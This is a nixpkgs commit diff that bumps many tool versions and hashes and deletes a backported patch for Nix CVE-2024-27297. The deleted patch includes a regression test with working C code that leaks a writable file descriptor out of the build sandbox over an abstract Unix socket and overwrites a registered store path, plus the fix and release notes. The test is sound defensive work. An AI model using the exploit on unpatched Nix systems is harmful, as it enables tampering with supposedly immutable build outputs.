diff options
Diffstat (limited to 'pkgs/tools')
19 files changed, 56 insertions, 425 deletions
diff --git a/pkgs/tools/admin/qovery-cli/default.nix b/pkgs/tools/admin/qovery-cli/default.nix index f7a0eb41a3df..7d8ebca61f16 100644 --- a/pkgs/tools/admin/qovery-cli/default.nix +++ b/pkgs/tools/admin/qovery-cli/default.nix @@ -8,16 +8,16 @@ buildGoModule rec { pname = "qovery-cli"; - version = "0.84.3"; + version = "0.84.4"; src = fetchFromGitHub { owner = "Qovery"; repo = "qovery-cli"; rev = "refs/tags/v${version}"; - hash = "sha256-rDQFt5P+Clp0JCCTG/2r69ZGiXXk3OM+rJfJ6HSKOBo="; + hash = "sha256-Er7rmIo/7B4cVNVCg04ILjVajwtwlZM386V+MiCf0ok="; }; - vendorHash = "sha256-XG0dOEpu+NoQmklsukxev1gc2OsZc7fLEkv0AGwkh7o="; + vendorHash = "sha256-YcLgmGCmOEawgTh0CvwmvOg3NAQxvA5Q9SJcH5dpwyQ="; nativeBuildInputs = [ installShellFiles diff --git a/pkgs/tools/audio/dl-librescore/default.nix b/pkgs/tools/audio/dl-librescore/default.nix index a84f12e8fa53..75a35a02beb2 100644 --- a/pkgs/tools/audio/dl-librescore/default.nix +++ b/pkgs/tools/audio/dl-librescore/default.nix @@ -8,16 +8,16 @@ buildNpmPackage rec { pname = "dl-librescore"; - version = "0.34.59"; + version = "0.35.1"; src = fetchFromGitHub { owner = "LibreScore"; repo = "dl-librescore"; rev = "v${version}"; - hash = "sha256-ZpY+cWtNf/s4Aw42eDc9/0jXzVHugEmU91Qgu9p1f0w="; + hash = "sha256-W/55Bbq5yiocNLOU1+j1TwkGawyF8sObtMmPW3ph35A="; }; - npmDepsHash = "sha256-DX3to2SNYhNWIJqcz5Mberuk/HSpCO538CjsvvALgkI="; + npmDepsHash = "sha256-Boa/WnptJYJNRdcLgua5GmLT2H9tBpZR+vvAFZC1s4k="; # see https://github.com/LibreScore/dl-librescore/pull/32 # TODO can be removed with next update diff --git a/pkgs/tools/misc/broot/default.nix b/pkgs/tools/misc/broot/default.nix index 5e71e81d7d0f..4a2470e86ffa 100644 --- a/pkgs/tools/misc/broot/default.nix +++ b/pkgs/tools/misc/broot/default.nix @@ -18,16 +18,16 @@ rustPlatform.buildRustPackage rec { pname = "broot"; - version = "1.36.0"; + version = "1.36.1"; src = fetchFromGitHub { owner = "Canop"; repo = pname; rev = "v${version}"; - hash = "sha256-nHEGvd9v0SuA3JsTOA2LTB+IDwbo5sBM1+j+K/ktDAc="; + hash = "sha256-mwccjsrveqoepBaCeQaija3DsXcuMtCK5PyoghtAJ9w="; }; - cargoHash = "sha256-LKBxN4SPkm2atOqQlZJfkt1ak4fMXQX1xR85q+8Ch8I="; + cargoHash = "sha256-GykLzXKFtebFuOWLtZ2Qj5OrZXiSrfEJ98cog5PwCfQ="; nativeBuildInputs = [ installShellFiles diff --git a/pkgs/tools/misc/fastfetch/default.nix b/pkgs/tools/misc/fastfetch/default.nix index ce28107d9f4a..54c1bb587fce 100644 --- a/pkgs/tools/misc/fastfetch/default.nix +++ b/pkgs/tools/misc/fastfetch/default.nix @@ -43,13 +43,13 @@ stdenv.mkDerivation (finalAttrs: { pname = "fastfetch"; - version = "2.8.8"; + version = "2.8.9"; src = fetchFromGitHub { owner = "fastfetch-cli"; repo = "fastfetch"; rev = finalAttrs.version; - hash = "sha256-IvAUlCDtrtBiaKZbhAiXqQXbpKiqIaKwMVC3NxaAqtw="; + hash = "sha256-UvAIIkH9PNlvLzlh0jm1kG+4OfWsWtt2LSFbFPm7Yv4="; }; outputs = [ "out" "man" ]; diff --git a/pkgs/tools/misc/kcollectd/default.nix b/pkgs/tools/misc/kcollectd/default.nix index a5c1039274a4..dc45a18fe3dd 100644 --- a/pkgs/tools/misc/kcollectd/default.nix +++ b/pkgs/tools/misc/kcollectd/default.nix @@ -18,12 +18,12 @@ mkDerivation rec { pname = "kcollectd"; - version = "0.12.0"; + version = "0.12.1"; src = fetchFromGitLab { owner = "aerusso"; repo = pname; rev = "v${version}"; - sha256 = "sha256-Ihd4Ps4t9+sNB3joO3vTxDR/25t7Ecl6yvHQ15QiUdY="; + sha256 = "sha256-bUVL5eRQ5UkSZo562pnyEcj0fVoSC5WHRq4BfN67jEM="; }; nativeBuildInputs = [ diff --git a/pkgs/tools/misc/ollama/default.nix b/pkgs/tools/misc/ollama/default.nix index 8730fe0d0782..0facac21e5be 100644 --- a/pkgs/tools/misc/ollama/default.nix +++ b/pkgs/tools/misc/ollama/default.nix @@ -132,8 +132,11 @@ goBuild ((lib.optionalAttrs enableRocm { # ollama's patches of llama.cpp's example server # `ollama/llm/generate/gen_common.sh` -> "apply temporary patches until fix is upstream" - (preparePatch "01-cache.diff" "sha256-MTTln2G0G8dntihUzEjPM1ruTsApb4ZToBczJb8EG68=") - (preparePatch "02-cudaleaks.diff" "sha256-Cu7E9iEcvddPL9mPPI5Z96qmwWigi3f0WgSpPRjGc88=") + (preparePatch "01-cache.diff" "sha256-VDwu/iK6taBCyscpndQiOJ3eGqonnLVwmS2rJNMBVGU=") + (preparePatch "02-cudaleaks.diff" "sha256-nxsWgrePUMsZBWWQAjqVHWMJPzr1owH1zSJvUU7Q5pA=") + (preparePatch "03-load_exception.diff" "sha256-1DfNahFYYxqlx4E4pwMKQpL+XR0bibYnDFGt6dCL4TM=") + (preparePatch "04-locale.diff" "sha256-r5nHiP6yN/rQObRu2FZIPBKpKP9yByyZ6sSI2SKj6Do=") + (preparePatch "05-fix-clip-free.diff" "sha256-EFZ+QTtZCvstVxYgVdFKHsQqdkL98T0eXOEBOqCrlL4=") ]; postPatch = '' # use a patch from the nix store in the `go generate` script diff --git a/pkgs/tools/misc/pricehist/default.nix b/pkgs/tools/misc/pricehist/default.nix index 04333a290731..d195cb42a147 100644 --- a/pkgs/tools/misc/pricehist/default.nix +++ b/pkgs/tools/misc/pricehist/default.nix @@ -9,6 +9,7 @@ , pytest-mock , responses , pytestCheckHook +, pythonRelaxDepsHook }: buildPythonApplication rec { @@ -31,11 +32,20 @@ buildPythonApplication rec { poetry-core ]; + nativeBuildInputs = [ + pythonRelaxDepsHook + ]; + nativeCheckInputs = [ responses pytest-mock pytestCheckHook ]; + + pythonRelaxDeps = [ + # https://gitlab.com/chrisberkhout/pricehist/-/issues/6 + "lxml" + ]; meta = with lib; { description = "A command-line tool for fetching and formatting historical price data, with support for multiple data sources and output formats"; homepage = "https://gitlab.com/chrisberkhout/pricehist"; diff --git a/pkgs/tools/networking/openssh/default.nix b/pkgs/tools/networking/openssh/default.nix index 2cc6c792381b..e0d34e23a6b0 100644 --- a/pkgs/tools/networking/openssh/default.nix +++ b/pkgs/tools/networking/openssh/default.nix @@ -58,12 +58,12 @@ in openssh_gssapi = common rec { pname = "openssh-with-gssapi"; - version = "9.5p1"; + version = "9.6p1"; extraDesc = " with GSSAPI support"; src = fetchurl { url = "mirror://openbsd/OpenSSH/portable/openssh-${version}.tar.gz"; - hash = "sha256-8Cbnt5un+1QPdRgq+W3IqPHbOV+SK7yfbKYDZyaGCGs="; + hash = "sha256-kQIRwHJVqMWtZUORtA7lmABxDdgRndU2LeCThap6d3w="; }; extraPatches = [ @@ -72,7 +72,7 @@ in (fetchpatch { name = "openssh-gssapi.patch"; url = "https://salsa.debian.org/ssh-team/openssh/raw/debian/1%25${version}-1/debian/patches/gssapi.patch"; - sha256 = "sha256-E36jxnPcu6RTyXXb9yVBCoFIVchiOSLX7L74ng1Dmao="; + hash = "sha256-gzDQdO6yOoN0apGj5aoKFdUkmKzFyphFUdgNhDLMp8U="; }) ]; diff --git a/pkgs/tools/networking/v2ray/default.nix b/pkgs/tools/networking/v2ray/default.nix index a3d087bbd644..aa398dfcb9f3 100644 --- a/pkgs/tools/networking/v2ray/default.nix +++ b/pkgs/tools/networking/v2ray/default.nix @@ -6,18 +6,18 @@ buildGoModule rec { pname = "v2ray-core"; - version = "5.14.1"; + version = "5.15.0"; src = fetchFromGitHub { owner = "v2fly"; repo = "v2ray-core"; rev = "v${version}"; - hash = "sha256-fa8bgI1xpxunAr69xz2CPmo7XWoCODlBAnlb7fQg43U="; + hash = "sha256-XxmzJfZa05Kf32Lh6FapYpQZProJyzlXoXKnDPiWqMQ="; }; # `nix-update` doesn't support `vendorHash` yet. # https://github.com/Mic92/nix-update/pull/95 - vendorHash = "sha256-PPytLBW+dvZW/TWjTpqkP1zPwgh1Ji58BHzBUY9wRW8="; + vendorHash = "sha256-SQ7DcrKYf4Wclp/HG8e7q5YPvVNj/kHV/pGmEyOU/BY="; ldflags = [ "-s" "-w" ]; diff --git a/pkgs/tools/package-management/comma/default.nix b/pkgs/tools/package-management/comma/default.nix index b73e64924a6d..cf3b9c3dc9e4 100644 --- a/pkgs/tools/package-management/comma/default.nix +++ b/pkgs/tools/package-management/comma/default.nix @@ -10,16 +10,16 @@ rustPlatform.buildRustPackage rec { pname = "comma"; - version = "1.7.1"; + version = "1.8.0"; src = fetchFromGitHub { owner = "nix-community"; repo = "comma"; rev = "v${version}"; - hash = "sha256-x2HVm2vcEFHDrCQLIp5QzNsDARcbBfPdaIMLWVNfi4c="; + hash = "sha256-PW9OS/ccRxigP0ikk1XR4QhQX4j9+ALQz0FMKXF3yRA="; }; - cargoHash = "sha256-N6Bc0+m0Qz1c/80oLvQTj8gvMusPXIriegNlRYWWStU="; + cargoHash = "sha256-lNz4E+dcJ6ACkNraM4DUR4yFbkWgAZ4ngbAML8JYVtE="; nativeBuildInputs = [ makeBinaryWrapper ]; diff --git a/pkgs/tools/package-management/dnf5/default.nix b/pkgs/tools/package-management/dnf5/default.nix index fc22001a5192..39c2b0cb329b 100644 --- a/pkgs/tools/package-management/dnf5/default.nix +++ b/pkgs/tools/package-management/dnf5/default.nix @@ -30,7 +30,7 @@ stdenv.mkDerivation (finalAttrs: { pname = "dnf5"; - version = "5.1.14"; + version = "5.1.15"; outputs = [ "out" "man" ]; @@ -38,7 +38,7 @@ stdenv.mkDerivation (finalAttrs: { owner = "rpm-software-management"; repo = "dnf5"; rev = finalAttrs.version; - hash = "sha256-LVemkL3Ysv2hS0/c+ZTqzEKq3kFu+T1rEBwZpjssE2k="; + hash = "sha256-IDF/jRnPpGbHk5bY7plkCO1x/i10H+HCcU88JI4EHvs="; }; nativeBuildInputs = [ diff --git a/pkgs/tools/package-management/nix/default.nix b/pkgs/tools/package-management/nix/default.nix index f5f2b81f6532..b88bdec3cd52 100644 --- a/pkgs/tools/package-management/nix/default.nix +++ b/pkgs/tools/package-management/nix/default.nix @@ -242,12 +242,8 @@ in lib.makeExtensible (self: ({ }; nix_2_18 = common { - version = "2.18.1"; - hash = "sha256-WNmifcTsN9aG1ONkv+l2BC4sHZZxtNKy0keqBHXXQ7w="; - patches = [ - patch-rapidcheck-shared - ./patches/2_18/CVE-2024-27297.patch - ]; + version = "2.18.2"; + hash = "sha256-8gNJlBlv2bnffRg0CejiBXc6U/S6YeCLAdHrYvTPyoY="; }; nix_2_19 = common { diff --git a/pkgs/tools/package-management/nix/patches/2_18/CVE-2024-27297.patch b/pkgs/tools/package-management/nix/patches/2_18/CVE-2024-27297.patch deleted file mode 100644 index 8d110d46a6bb..000000000000 --- a/pkgs/tools/package-management/nix/patches/2_18/CVE-2024-27297.patch +++ /dev/null @@ -1,379 +0,0 @@ -From f8d20e91a45f71b60402f5916d2475751c089c84 Mon Sep 17 00:00:00 2001 -From: Tom Bereknyei <tomberek@gmail.com> -Date: Fri, 1 Mar 2024 03:42:26 -0500 -Subject: [PATCH 1/3] Add a NixOS test for the sandbox escape - -Test that we can't leverage abstract unix domain sockets to leak file -descriptors out of the sandbox and modify the path after it has been -registered. - -Co-authored-by: Theophane Hufschmitt <theophane.hufschmitt@tweag.io> ---- - flake.nix | 2 + - tests/nixos/ca-fd-leak/default.nix | 90 ++++++++++++++++++++++++++++++ - tests/nixos/ca-fd-leak/sender.c | 65 +++++++++++++++++++++ - tests/nixos/ca-fd-leak/smuggler.c | 66 ++++++++++++++++++++++ - 4 files changed, 223 insertions(+) - create mode 100644 tests/nixos/ca-fd-leak/default.nix - create mode 100644 tests/nixos/ca-fd-leak/sender.c - create mode 100644 tests/nixos/ca-fd-leak/smuggler.c - -diff --git a/flake.nix b/flake.nix -index 230bb6031..4a54c660f 100644 ---- a/flake.nix -+++ b/flake.nix -@@ -634,6 +634,8 @@ - ["i686-linux" "x86_64-linux"] - (system: runNixOSTestFor system ./tests/nixos/setuid.nix); - -+ tests.ca-fd-leak = runNixOSTestFor "x86_64-linux" ./tests/nixos/ca-fd-leak; -+ - - # Make sure that nix-env still produces the exact same result - # on a particular version of Nixpkgs. -diff --git a/tests/nixos/ca-fd-leak/default.nix b/tests/nixos/ca-fd-leak/default.nix -new file mode 100644 -index 000000000..a6ae72adc ---- /dev/null -+++ b/tests/nixos/ca-fd-leak/default.nix -@@ -0,0 +1,90 @@ -+# Nix is a sandboxed build system. But Not everything can be handled inside its -+# sandbox: Network access is normally blocked off, but to download sources, a -+# trapdoor has to exist. Nix handles this by having "Fixed-output derivations". -+# The detail here is not important, but in our case it means that the hash of -+# the output has to be known beforehand. And if you know that, you get a few -+# rights: you no longer run inside a special network namespace! -+# -+# Now, Linux has a special feature, that not many other unices do: Abstract -+# unix domain sockets! Not only that, but those are namespaced using the -+# network namespace! That means that we have a way to create sockets that are -+# available in every single fixed-output derivation, and also all processes -+# running on the host machine! Now, this wouldn't be that much of an issue, as, -+# well, the whole idea is that the output is pure, and all processes in the -+# sandbox are killed before finalizing the output. What if we didn't need those -+# processes at all? Unix domain sockets have a semi-known trick: you can pass -+# file descriptors around! -+# This makes it possible to exfiltrate a file-descriptor with write access to -+# $out outside of the sandbox. And that file-descriptor can be used to modify -+# the contents of the store path after it has been registered. -+ -+{ config, ... }: -+ -+let -+ pkgs = config.nodes.machine.nixpkgs.pkgs; -+ -+ # Simple C program that sends a a file descriptor to `$out` to a Unix -+ # domain socket. -+ # Compiled statically so that we can easily send it to the VM and use it -+ # inside the build sandbox. -+ sender = pkgs.runCommandWith { -+ name = "sender"; -+ stdenv = pkgs.pkgsStatic.stdenv; -+ } '' -+ $CC -static -o $out ${./sender.c} -+ ''; -+ -+ # Okay, so we have a file descriptor shipped out of the FOD now. But the -+ # Nix store is read-only, right? .. Well, yeah. But this file descriptor -+ # lives in a mount namespace where it is not! So even when this file exists -+ # in the actual Nix store, we're capable of just modifying its contents... -+ smuggler = pkgs.writeCBin "smuggler" (builtins.readFile ./smuggler.c); -+ -+ # The abstract socket path used to exfiltrate the file descriptor -+ socketName = "FODSandboxExfiltrationSocket"; -+in -+{ -+ name = "ca-fd-leak"; -+ -+ nodes.machine = -+ { config, lib, pkgs, ... }: -+ { virtualisation.writableStore = true; -+ nix.settings.substituters = lib.mkForce [ ]; -+ virtualisation.additionalPaths = [ pkgs.busybox-sandbox-shell sender smuggler pkgs.socat ]; -+ }; -+ -+ testScript = { nodes }: '' -+ start_all() -+ -+ machine.succeed("echo hello") -+ # Start the smuggler server -+ machine.succeed("${smuggler}/bin/smuggler ${socketName} >&2 &") -+ -+ # Build the smuggled derivation. -+ # This will connect to the smuggler server and send it the file descriptor -+ machine.succeed(r""" -+ nix-build -E ' -+ builtins.derivation { -+ name = "smuggled"; -+ system = builtins.currentSystem; -+ # look ma, no tricks! -+ outputHashMode = "flat"; -+ outputHashAlgo = "sha256"; -+ outputHash = builtins.hashString "sha256" "hello, world\n"; -+ builder = "${pkgs.busybox-sandbox-shell}/bin/sh"; -+ args = [ "-c" "echo \"hello, world\" > $out; ''${${sender}} ${socketName}" ]; -+ }' -+ """.strip()) -+ -+ -+ # Tell the smuggler server that we're done -+ machine.execute("echo done | ${pkgs.socat}/bin/socat - ABSTRACT-CONNECT:${socketName}") -+ -+ # Check that the file was not modified -+ machine.succeed(r""" -+ cat ./result -+ test "$(cat ./result)" = "hello, world" -+ """.strip()) -+ ''; -+ -+} -diff --git a/tests/nixos/ca-fd-leak/sender.c b/tests/nixos/ca-fd-leak/sender.c -new file mode 100644 -index 000000000..75e54fc8f ---- /dev/null -+++ b/tests/nixos/ca-fd-leak/sender.c -@@ -0,0 +1,65 @@ -+#include <sys/socket.h> -+#include <sys/un.h> -+#include <stdlib.h> -+#include <stddef.h> -+#include <stdio.h> -+#include <unistd.h> -+#include <fcntl.h> -+#include <errno.h> -+#include <string.h> -+#include <assert.h> -+ -+int main(int argc, char **argv) { -+ -+ assert(argc == 2); -+ -+ int sock = socket(AF_UNIX, SOCK_STREAM, 0); -+ -+ // Set up a abstract domain socket path to connect to. -+ struct sockaddr_un data; -+ data.sun_family = AF_UNIX; -+ data.sun_path[0] = 0; -+ strcpy(data.sun_path + 1, argv[1]); -+ -+ // Now try to connect, To ensure we work no matter what order we are -+ // executed in, just busyloop here. -+ int res = -1; -+ while (res < 0) { -+ res = connect(sock, (const struct sockaddr *)&data, -+ offsetof(struct sockaddr_un, sun_path) -+ + strlen(argv[1]) -+ + 1); -+ if (res < 0 && errno != ECONNREFUSED) perror("connect"); -+ if (errno != ECONNREFUSED) break; -+ } -+ -+ // Write our message header. -+ struct msghdr msg = {0}; -+ msg.msg_control = malloc(128); -+ msg.msg_controllen = 128; -+ -+ // Write an SCM_RIGHTS message containing the output path. -+ struct cmsghdr *hdr = CMSG_FIRSTHDR(&msg); -+ hdr->cmsg_len = CMSG_LEN(sizeof(int)); -+ hdr->cmsg_level = SOL_SOCKET; -+ hdr->cmsg_type = SCM_RIGHTS; -+ int fd = open(getenv("out"), O_RDWR | O_CREAT, 0640); -+ memcpy(CMSG_DATA(hdr), (void *)&fd, sizeof(int)); -+ -+ msg.msg_controllen = CMSG_SPACE(sizeof(int)); -+ -+ // Write a single null byte too. -+ msg.msg_iov = malloc(sizeof(struct iovec)); -+ msg.msg_iov[0].iov_base = ""; -+ msg.msg_iov[0].iov_len = 1; -+ msg.msg_iovlen = 1; -+ -+ // Send it to the othher side of this connection. -+ res = sendmsg(sock, &msg, 0); -+ if (res < 0) perror("sendmsg"); -+ int buf; -+ -+ // Wait for the server to close the socket, implying that it has -+ // received the commmand. -+ recv(sock, (void *)&buf, sizeof(int), 0); -+} -diff --git a/tests/nixos/ca-fd-leak/smuggler.c b/tests/nixos/ca-fd-leak/smuggler.c -new file mode 100644 -index 000000000..82acf37e6 ---- /dev/null -+++ b/tests/nixos/ca-fd-leak/smuggler.c -@@ -0,0 +1,66 @@ -+#include <sys/socket.h> -+#include <sys/un.h> -+#include <stdlib.h> -+#include <stddef.h> -+#include <stdio.h> -+#include <unistd.h> -+#include <assert.h> -+ -+int main(int argc, char **argv) { -+ -+ assert(argc == 2); -+ -+ int sock = socket(AF_UNIX, SOCK_STREAM, 0); -+ -+ // Bind to the socket. -+ struct sockaddr_un data; -+ data.sun_family = AF_UNIX; -+ data.sun_path[0] = 0; -+ strcpy(data.sun_path + 1, argv[1]); -+ int res = bind(sock, (const struct sockaddr *)&data, -+ offsetof(struct sockaddr_un, sun_path) -+ + strlen(argv[1]) -+ + 1); -+ if (res < 0) perror("bind"); -+ -+ res = listen(sock, 1); -+ if (res < 0) perror("listen"); -+ -+ int smuggling_fd = -1; -+ -+ // Accept the connection a first time to receive the file descriptor. -+ fprintf(stderr, "%s\n", "Waiting for the first connection"); -+ int a = accept(sock, 0, 0); -+ if (a < 0) perror("accept"); -+ -+ struct msghdr msg = {0}; -+ msg.msg_control = malloc(128); -+ msg.msg_controllen = 128; -+ -+ // Receive the file descriptor as sent by the smuggler. -+ recvmsg(a, &msg, 0); -+ -+ struct cmsghdr *hdr = CMSG_FIRSTHDR(&msg); -+ while (hdr) { -+ if (hdr->cmsg_level == SOL_SOCKET -+ && hdr->cmsg_type == SCM_RIGHTS) { -+ -+ // Grab the copy of the file descriptor. -+ memcpy((void *)&smuggling_fd, CMSG_DATA(hdr), sizeof(int)); -+ } -+ -+ hdr = CMSG_NXTHDR(&msg, hdr); -+ } -+ fprintf(stderr, "%s\n", "Got the file descriptor. Now waiting for the second connection"); -+ close(a); -+ -+ // Wait for a second connection, which will tell us that the build is -+ // done -+ a = accept(sock, 0, 0); -+ fprintf(stderr, "%s\n", "Got a second connection, rewriting the file"); -+ // Write a new content to the file -+ if (ftruncate(smuggling_fd, 0)) perror("ftruncate"); -+ char * new_content = "Pwned\n"; -+ int written_bytes = write(smuggling_fd, new_content, strlen(new_content)); -+ if (written_bytes != strlen(new_content)) perror("write"); -+} --- -2.42.0 - - -From 4bc5a3510fa3735798f9ed3a2a30a3ea7b32343a Mon Sep 17 00:00:00 2001 -From: Tom Bereknyei <tomberek@gmail.com> -Date: Fri, 1 Mar 2024 03:45:39 -0500 -Subject: [PATCH 2/3] Copy the output of fixed-output derivations before - registering them - -It is possible to exfiltrate a file descriptor out of the build sandbox -of FODs, and use it to modify the store path after it has been -registered. -To avoid that issue, don't register the output of the build, but a copy -of it (that will be free of any leaked file descriptor). - -Co-authored-by: Theophane Hufschmitt <theophane.hufschmitt@tweag.io> -Co-authored-by: Valentin Gagarin <valentin.gagarin@tweag.io> ---- - src/libstore/build/local-derivation-goal.cc | 6 ++++++ - src/libutil/filesystem.cc | 6 ++++++ - src/libutil/util.hh | 7 +++++++ - 3 files changed, 19 insertions(+) - -diff --git a/src/libstore/build/local-derivation-goal.cc b/src/libstore/build/local-derivation-goal.cc -index 64b55ca6a..f1e22f829 100644 ---- a/src/libstore/build/local-derivation-goal.cc -+++ b/src/libstore/build/local-derivation-goal.cc -@@ -2558,6 +2558,12 @@ SingleDrvOutputs LocalDerivationGoal::registerOutputs() - [&](const DerivationOutput::CAFixed & dof) { - auto & wanted = dof.ca.hash; - -+ // Replace the output by a fresh copy of itself to make sure -+ // that there's no stale file descriptor pointing to it -+ Path tmpOutput = actualPath + ".tmp"; -+ copyFile(actualPath, tmpOutput, true); -+ renameFile(tmpOutput, actualPath); -+ - auto newInfo0 = newInfoFromCA(DerivationOutput::CAFloating { - .method = dof.ca.method, - .hashType = wanted.type, -diff --git a/src/libutil/filesystem.cc b/src/libutil/filesystem.cc -index 11cc0c0e7..2a7787c0e 100644 ---- a/src/libutil/filesystem.cc -+++ b/src/libutil/filesystem.cc -@@ -133,6 +133,12 @@ void copy(const fs::directory_entry & from, const fs::path & to, bool andDelete) - } - } - -+ -+void copyFile(const Path & oldPath, const Path & newPath, bool andDelete) -+{ -+ return copy(fs::directory_entry(fs::path(oldPath)), fs::path(newPath), andDelete); -+} -+ - void renameFile(const Path & oldName, const Path & newName) - { - fs::rename(oldName, newName); -diff --git a/src/libutil/util.hh b/src/libutil/util.hh -index b302d6f45..59d42e0a5 100644 ---- a/src/libutil/util.hh -+++ b/src/libutil/util.hh -@@ -274,6 +274,13 @@ void renameFile(const Path & src, const Path & dst); - */ - void moveFile(const Path & src, const Path & dst); - -+/** -+ * Recursively copy the content of `oldPath` to `newPath`. If `andDelete` is -+ * `true`, then also remove `oldPath` (making this equivalent to `moveFile`, but -+ * with the guaranty that the destination will be “fresh”, with no stale inode -+ * or file descriptor pointing to it). -+ */ -+void copyFile(const Path & oldPath, const Path & newPath, bool andDelete); - - /** - * Wrappers arount read()/write() that read/write exactly the --- -2.42.0 - - -From 9e7065bef5469b3024cde2bbc7745530a64fde5b Mon Sep 17 00:00:00 2001 -From: Tom Bereknyei <tomberek@gmail.com> -Date: Fri, 1 Mar 2024 04:01:23 -0500 -Subject: [PATCH 3/3] Add release notes - -Co-authored-by: Theophane Hufschmitt <theophane.hufschmitt@tweag.io> ---- - doc/manual/src/release-notes/rl-next.md | 8 ++++++++ - 1 file changed, 8 insertions(+) - -diff --git a/doc/manual/src/release-notes/rl-next.md b/doc/manual/src/release-notes/rl-next.md -index c869b5e2f..f77513385 100644 ---- a/doc/manual/src/release-notes/rl-next.md -+++ b/doc/manual/src/release-notes/rl-next.md -@@ -1 +1,9 @@ - # Release X.Y (202?-??-??) -+ -+- Fix a FOD sandbox escape: -+ Cooperating Nix derivations could send file descriptors to files in the Nix -+ store to each other via Unix domain sockets in the abstract namespace. This -+ allowed one derivation to modify the output of the other derivation, after Nix -+ has registered the path as "valid" and immutable in the Nix database. -+ In particular, this allowed the output of fixed-output derivations to be -+ modified from their expected content. This isn't the case any more. --- -2.42.0 - diff --git a/pkgs/tools/security/cloudfox/default.nix b/pkgs/tools/security/cloudfox/default.nix index 48d28257d9f4..85777c91be09 100644 --- a/pkgs/tools/security/cloudfox/default.nix +++ b/pkgs/tools/security/cloudfox/default.nix @@ -5,16 +5,16 @@ buildGoModule rec { pname = "cloudfox"; - version = "1.13.3"; + version = "1.13.4"; src = fetchFromGitHub { owner = "BishopFox"; - repo = pname; + repo = "cloudfox"; rev = "refs/tags/v${version}"; - hash = "sha256-Sq3ARcAK1EFbK6Y+pSCg8ayhVmnEmVQWF0eAiVhJNPs="; + hash = "sha256-nN/gSvAwKjfZulqH4caGoJmzlY0ik8JrFReuvYWwZTE="; }; - vendorHash = "sha256-qPIMmyKTmZEmxlLLftRMnBXvo22WFROYlCAAsAb7jDg="; + vendorHash = "sha256-aRbGBEci3QT1mH+yaOUVynPysJ1za6CaoLGppJaa94c="; ldflags = [ "-w" diff --git a/pkgs/tools/security/cnspec/default.nix b/pkgs/tools/security/cnspec/default.nix index 38c8813a301c..b02e670666bf 100644 --- a/pkgs/tools/security/cnspec/default.nix +++ b/pkgs/tools/security/cnspec/default.nix @@ -5,18 +5,18 @@ buildGoModule rec { pname = "cnspec"; - version = "10.7.1"; + version = "10.7.3"; src = fetchFromGitHub { owner = "mondoohq"; repo = "cnspec"; rev = "refs/tags/v${version}"; - hash = "sha256-i7XZXZuEZasW00HMpwyyS7pxI8hMrx6DZmp39sj1IyI="; + hash = "sha256-TFwMquMyHnUGyHGKBrialsDKL5Mubsop1Sudyu/IGjE="; }; proxyVendor = true; - vendorHash = "sha256-B5wwA2S6LiMRBpM6fWaPVubKuOjkdYcffAssSbpLs48="; + vendorHash = "sha256-+hlJqcX3cGo/ej5HPPZBZCTUHvB9+/iPTebNKdokLQ0="; subPackages = [ "apps/cnspec" diff --git a/pkgs/tools/security/exploitdb/default.nix b/pkgs/tools/security/exploitdb/default.nix index fdf461a59d3b..e803aa746521 100644 --- a/pkgs/tools/security/exploitdb/default.nix +++ b/pkgs/tools/security/exploitdb/default.nix @@ -6,13 +6,13 @@ stdenv.mkDerivation rec { pname = "exploitdb"; - version = "2024-03-13"; + version = "2024-03-15"; src = fetchFromGitLab { owner = "exploit-database"; repo = pname; rev = "refs/tags/${version}"; - hash = "sha256-Lp69o/Cn2T410vpvfaF/SF8Kf6ehjLP3tcwuqIv7guM="; + hash = "sha256-5PUgea2Gz0qtHp+O31fxYTTWIc19Z0ZwVB7XqyFAxNU="; }; nativeBuildInputs = [ diff --git a/pkgs/tools/security/munge/default.nix b/pkgs/tools/security/munge/default.nix index fcf9026f215c..01137be20460 100644 --- a/pkgs/tools/security/munge/default.nix +++ b/pkgs/tools/security/munge/default.nix @@ -2,13 +2,13 @@ stdenv.mkDerivation rec { pname = "munge"; - version = "0.5.15"; + version = "0.5.16"; src = fetchFromGitHub { owner = "dun"; repo = "munge"; rev = "${pname}-${version}"; - sha256 = "sha256-Ot/oH/RdfPAzoi3P7EYkxS0Fr24KRWfBJxBEWRF0ctI="; + sha256 = "sha256-fv42RMUAP8Os33/iHXr70i5Pt2JWZK71DN5vFI3q7Ak="; }; strictDeps = true; diff --git a/pkgs/tools/security/trufflehog/default.nix b/pkgs/tools/security/trufflehog/default.nix index 5b6868fcc6c8..7486ce9bc099 100644 --- a/pkgs/tools/security/trufflehog/default.nix +++ b/pkgs/tools/security/trufflehog/default.nix @@ -7,16 +7,16 @@ buildGoModule rec { pname = "trufflehog"; - version = "3.69.0"; + version = "3.70.0"; src = fetchFromGitHub { owner = "trufflesecurity"; repo = "trufflehog"; rev = "refs/tags/v${version}"; - hash = "sha256-1O1iwZQdC4Vf/mGRauZwg6U52bF28IqCUw8Ugt3USFI="; + hash = "sha256-KcJhnev2j4Y7jlIZe2cUgkiJEz5V+oG69SURs5tXCVU="; }; - vendorHash = "sha256-c9CkQMTH2mRpKjlyV7lnNyKQYgPxEP9adHcSh9qsWYk="; + vendorHash = "sha256-oJ5aPffmBDCJ6cD2nG1Q5w+R6LV6oDf4v9hIWN9jNdc="; ldflags = [ "-s" diff --git a/pkgs/tools/text/vale/default.nix b/pkgs/tools/text/vale/default.nix index f5e02eef3924..cbc2893b1304 100644 --- a/pkgs/tools/text/vale/default.nix +++ b/pkgs/tools/text/vale/default.nix @@ -30,6 +30,7 @@ buildGoModule rec { description = "A syntax-aware linter for prose built with speed and extensibility in mind"; homepage = "https://vale.sh/"; changelog = "https://github.com/errata-ai/vale/releases/tag/v${version}"; + mainProgram = "vale"; license = licenses.mit; maintainers = [ maintainers.marsam ]; }; |